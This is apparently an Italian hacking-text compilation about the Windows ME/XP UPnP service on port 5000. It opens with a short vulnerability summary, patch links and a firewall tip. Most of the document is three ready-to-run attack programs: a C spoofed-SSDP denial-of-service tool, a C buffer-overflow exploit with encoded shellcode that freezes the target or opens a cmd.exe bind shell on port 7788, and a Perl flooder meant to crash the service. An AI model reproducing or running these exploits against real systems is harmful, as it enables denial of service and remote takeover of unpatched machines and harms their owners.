Porta ==>5000 
(rilevamento periferiche Plug&Play detti anche servizi upnp)

VULNERABILITA':
=>denial of service
=>buffer overrun

Patch Disponibile:
http://www.microsoft.com/technet/security/bulletin/ms01-054.asp
http://www.microsoft.com/technet/security/bulletin/MS01-059.asp

NOTA:
Si consiglia di settare il firewall sulle porte 1900 e 5000 per evitare attacchi provenienti 
da Internet.





/------------------------------------[taglia QUI]--------------------------------------
 * WinME/XP UPNP D0S  
 *
 * ./upnp_udp <remote_hostname> <spooffed_host> <chargen_port>
 *
 * Authors:     Gabriel Maggiotti, Fernando Oubina
 * Email:       gmaggiot@ciudad.com.ar, foubina@qb0x.net
 * Webpage:     http://qb0x.net
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>

#define MAX	1000
#define PORT	1900


char *str_replace(char *rep, char *orig, char *string)
{
int len=strlen(orig);
char buf[MAX]="";
char *pt=strstr(string,orig);

strncpy(buf,string, pt-string );
strcat(buf,rep);
strcat(buf,pt+strlen(orig));
strcpy(string,buf);
return string;
}

/***************************************************************************/

int main(int argc,char *argv[])
{
	int sockfd,i;
	int numbytes;
	int num_socks;
	int addr_len;
	char recive_buffer[MAX]="";

	char send_buffer[MAX]=
	"NOTIFY * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n"
	"CACHE-CONTROL: max-age=1\r\nLOCATION: http://www.host.com:port/\r\n"
	"NT: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
	"NTS: ssdp:alive\r\nSERVER: QB0X/201 UPnP/1.0 prouct/1.1\r\n"
	"USN: uuid:QB0X\r\n\r\n\r\n";

	char *aux=send_buffer;
	struct hostent *he;
	struct sockaddr_in their_addr;

	if(argc!=4)
	{
		fprintf(stderr,"usage:%s <remote_hostname> "\
			"<spooffed_host> <chargen_port>\n",argv[0]);
		exit(1);
	}


	aux=str_replace(argv[2],"www.host.com",send_buffer);
	aux=str_replace(argv[3],"port",send_buffer);

	if((he=gethostbyname(argv[1]))==NULL)
	{
		perror("gethostbyname");
		exit(1);
	}


	if( (sockfd=socket(AF_INET,SOCK_DGRAM,0)) == -1) {
		perror("socket"); exit(1);
	}

	their_addr.sin_family=AF_INET;
	their_addr.sin_port=htons(PORT);
	their_addr.sin_addr=*((struct in_addr*)he->h_addr);
	bzero(&(their_addr.sin_zero),8);

	if( (numbytes=sendto(sockfd,send_buffer,strlen(send_buffer),0,\
	(struct sockaddr *)&their_addr, sizeof(struct sockaddr))) ==-1)
	{
		perror("send");
		exit(0);
	}
	close(sockfd);

return 0;
}





/------------------------------------[taglia QUI]--------------------------------------
 * WinME/XP UPNP dos & overflow 
 *
 * Run: ./XPloit host <option>
 *
 * Windows run the "Universal Plug and Play technology" service 
 * at port 5000. In the future this will  allow for seemless 
 * connectivity of various devices such as a printer.
 * This service have a DoS and a buffer overflow I exploit here.
 *
 * PD: the -e option spawns a cmd.exe shell on port 7788 coded by isno
 *
 * Author:      Gabriel Maggiotti
 * Email:       gmaggiot@ciudad.com.ar
 * Webpage:     http://qb0x.net
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>

#define MAX	10000
#define PORT	5000
#define FREEZE	512
#define NOP	0x43	//inc ebx, instead of 0x90

/***************************************************************************/

int main(int argc,char *argv[])
{
int sockfd[MAX];
char sendXP[]="XP";
char jmpcode[281], execode[840],request[2048];
char *send_buffer;
int num_socks;
int bindport;
int i;
int port;

 unsigned char shellcode[] =
        "\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90"
        "\x90\x8b\xc5\x33\xc9\x66\xb9\x10\x03\x50\x80\x30\x97\x40\xe2\xfa"
        "\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x68\xc4\xf3\x36"
        "\x97\x97\x97\x97\xc7\xf3\x1e\xb2\x97\x97\x97\x97\xa4\x4c\x2c\x97"
        "\x97\x77\xe0\x7f\x4b\x96\x97\x97\x16\x6c\x97\x97\x68\x28\x98\x14"
        "\x59\x96\x97\x97\x16\x54\x97\x97\x96\x97\xf1\x16\xac\xda\xcd\xe2"
        "\x70\xa4\x57\x1c\xd4\xab\x94\x54\xf1\x16\xaf\xc7\xd2\xe2\x4e\x14"
        "\x57\xef\x1c\xa7\x94\x64\x1c\xd9\x9b\x94\x5c\x16\xae\xdc\xd2\xc5"
        "\xd9\xe2\x52\x16\xee\x93\xd2\xdb\xa4\xa5\xe2\x2b\xa4\x68\x1c\xd1"
        "\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\xc7\xe2\x9e\x16"
        "\xee\x93\xe5\xf8\xf4\xd6\xe3\x91\xd0\x14\x57\x93\x7c\x72\x94\x68"
        "\x94\x6c\x1c\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x1c\x6d\x1c\xd1"
        "\x87\xdf\x94\x6f\xa4\x5e\x1c\x58\x94\x5e\x94\x5e\x94\xd9\x8b\x94"
        "\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x60\x1c\x40\xa4"
        "\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\xc5\xc7\xc4\x68"
        "\x85\xcd\x1e\xd5\x93\x1a\xe5\x82\xc5\xc1\x68\xc5\x93\xcd\xa4\x57"
        "\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x13\x5e\xe3\x9e\xc5\xc1\xc4"
        "\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\xcd\x1c\x4f\xa4" 
	"\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x17\x6e\x95\xe3\x9e\xc5"
        "\xc1\xc4\x68\x85\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\xc7\xd7\xc7\x68"
        "\xc0\x7f\x04\xfd\x87\xc1\xc4\x68\xc0\x7b\xfd\x95\xc4\x68\xc0\x67"
        "\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\xdf\xc7\xc0\xc1"
        "\x3a\xc1\x68\xc0\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x68\xc0\x57\xdf"
        "\x27\xd3\x1e\x90\xc0\x68\xc0\x53\xa4\x57\x1c\xd1\x63\x1e\xd0\xab"
        "\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57\xf1\x2f\x96\x96\x1e\xd0"
        "\xbb\xc0\xc0\xa4\x57\xc7\xc7\xc7\xd7\xc7\xdf\xc7\xc7\x3a\xc1\xa4"
        "\x57\xc7\x68\xc0\x5f\x68\xe1\x67\x68\xc0\x5b\x68\xe1\x6b\x68\xc0"
        "\x5b\xdf\xc7\xc7\xc4\x68\xc0\x63\x1c\x4f\xa4\x57\x23\x93\xc7\x56"
        "\x7f\x93\xc7\x68\xc0\x43\x1c\x67\xa4\x57\x1c\x5f\x22\x93\xc7\xc7"
        "\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\xeb\xb5\xa4\x57"
        "\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x57\xe3\xb8\xa4"
        "\x57\xc7\x68\xa0\xc1\xc4\x68\xc0\x6f\xfd\xc7\x68\xc0\x77\x7c\x5f"
        "\xa4\x57\xc7\x23\x93\xc7\xc1\xc4\x68\xc0\x6b\xc0\xa4\x5e\xc6\xc7"
        "\xc1\x68\xe0\x3b\x68\xc0\x4f\xfd\xc7\x68\xc0\x77\x7c\x3d\xc7\x68"
        "\xc0\x73\x7c\x69\xcf\xc7\x1e\xd5\x65\x54\x1c\xd3\xb3\x9b\x92\x2f"
        "\x97\x97\x97\x50\x97\xef\xc1\xa3\x85\xa4\x57\x54\x7c\x7b\x7f\x75"
        "\x6a\x68\x68\x7f\x05\x69\x68\x68\xdc\xc1\x70\xe0\xb4\x17\x70\xe0"
        "\xdb\xf8\xf6\xf3\xdb\xfe\xf5\xe5\xf6\xe5\xee\xd6\x97\xdc\xd2\xc5"
        "\xd9\xd2\xdb\xa4\xa5\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xfe\xe7\xf2"
        "\x97\xd0\xf2\xe3\xc4\xe3\xf6\xe5\xe3\xe2\xe7\xde\xf9\xf1\xf8\xd6"  
 	"\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xe5\xf8\xf4\xf2\xe4\xe4\xd6\x97"
        "\xd4\xfb\xf8\xe4\xf2\xdf\xf6\xf9\xf3\xfb\xf2\x97\xc7\xf2\xf2\xfc"
        "\xd9\xf6\xfa\xf2\xf3\xc7\xfe\xe7\xf2\x97\xd0\xfb\xf8\xf5\xf6\xfb"
        "\xd6\xfb\xfb\xf8\xf4\x97\xc0\xe5\xfe\xe3\xf2\xd1\xfe\xfb\xf2\x97"
        "\xc5\xf2\xf6\xf3\xd1\xfe\xfb\xf2\x97\xc4\xfb\xf2\xf2\xe7\x97\xd2"
        "\xef\xfe\xe3\xc7\xe5\xf8\xf4\xf2\xe4\xe4\x97\x97\xc0\xc4\xd8\xd4"
        "\xdc\xa4\xa5\x97\xe4\xf8\xf4\xfc\xf2\xe3\x97\xf5\xfe\xf9\xf3\x97"
        "\xfb\xfe\xe4\xe3\xf2\xf9\x97\xf6\xf4\xf4\xf2\xe7\xe3\x97\xe4\xf2"
        "\xf9\xf3\x97\xe5\xf2\xf4\xe1\x97\x95\x97\x89\xfb\x97\x97\x97\x97"
        "\x97\x97\x97\x97\x97\x97\x97\x97\xf4\xfa\xf3\xb9\xf2\xef\xf2\x97"
        "\x68\x68\x68\x68";                              
struct hostent *he;
struct sockaddr_in their_addr;


	if(argc!=3)
	{
		fprintf(stderr,"usage:%s <hostname> <command>\n",argv[0]);
		fprintf(stderr,"-f  freeze the machine.\n");
		fprintf(stderr,"-e  exploit.\n");
		exit(1);
	}


	if(strstr(argv[2],"-f")) {
		num_socks=FREEZE;
		send_buffer=sendXP;
	}

	if(strstr(argv[2],"-e")) {
		num_socks=1;
		send_buffer=request;
		bindport^=0x9797;
		shellcode[778]= (bindport) & 0xff;
		shellcode[779]= (bindport >> 8) & 0xff;

		for(i = 0; i < 268; i++)
		        jmpcode[i] = (char)NOP;

		jmpcode[268] = (char)0x4d;
		jmpcode[269] = (char)0x3f;
		jmpcode[270] = (char)0xe3;
		jmpcode[271] = (char)0x77;
		jmpcode[272] = (char)0x90;
		jmpcode[273] = (char)0x90;
		jmpcode[274] = (char)0x90;
		jmpcode[275] = (char)0x90;

		//jmp [ebx+0x64], jump to execute shellcode
		jmpcode[276] = (char)0xff;
		jmpcode[277] = (char)0x63;
		jmpcode[278] = (char)0x64;
		jmpcode[279] = (char)0x90;
		jmpcode[280] = (char)0x00;

		for(i = 0; i < 32; i++)
        		execode[i] = (char)NOP;
		execode[32]=(char)0x00;
		strcat(execode, shellcode);

        	snprintf(request, 2048, "%s%s\r\n\r\n", jmpcode, execode);
	}

	if((he=gethostbyname(argv[1]))==NULL)
	{
		perror("gethostbyname");
		exit(1);
	}


/***************************************************************************/

	for(i=0; i<num_socks;i++)
		if( (sockfd[i]=socket(AF_INET,SOCK_STREAM,0)) == -1) {
			perror("socket"); exit(1);
		}


	their_addr.sin_family=AF_INET;
	their_addr.sin_port=htons(PORT);
	their_addr.sin_addr=*((struct in_addr*)he->h_addr);
	bzero(&(their_addr.sin_zero),8);



	for(i=0; i<num_socks;i++)
		if( connect(sockfd[i],(struct sockaddr*)&their_addr, sizeof(struct sockaddr))==-1)
	{
		perror("connect");
		exit(1);
	}

	
	for(i=0; i<num_socks;i++)
	if(send(sockfd[i],send_buffer,strlen(send_buffer),0) ==-1)
	{
		perror("send");
		exit(0);
	}


	for(i=0; i<num_socks;i++)
	close(sockfd[i]);


return 0;
}





#------------------------------------[taglia QUI]-------------------------------------->
#!/usr/bin/perl
#
# UPnP Flooder
#
# Perl Version
# Coded by Xanthic
#
# 03/05/2004
#
# Thx to FauLeY.
#

use IO::Socket;

die "\n Istruzioni : perl $0 [host] [numero richieste]\n" if $#ARGV<1;

  $port = "5000";
  $rich = "A" x 480;

  print "\nMi sto connettendo a $ARGV[0] : $port...\n\n";
  $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$ARGV[0], PeerPort=>$port) || 
          die "La porta e' chiusa o c'e' un firewall :(\n";

  $count = 0;
   print "Ripeto la richiesta per altre $ARGV[1] volte...\n";
    while($count < $ARGV[1]) {
          print $sock "$rich\n";
          $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$ARGV[0], PeerPort=>$port) || 
                  die "\nL'host e' andato giu' :)\n";
          print ".";
          $count += 1;
    }
   print "\n\nFine.\n\n";

   close($sock);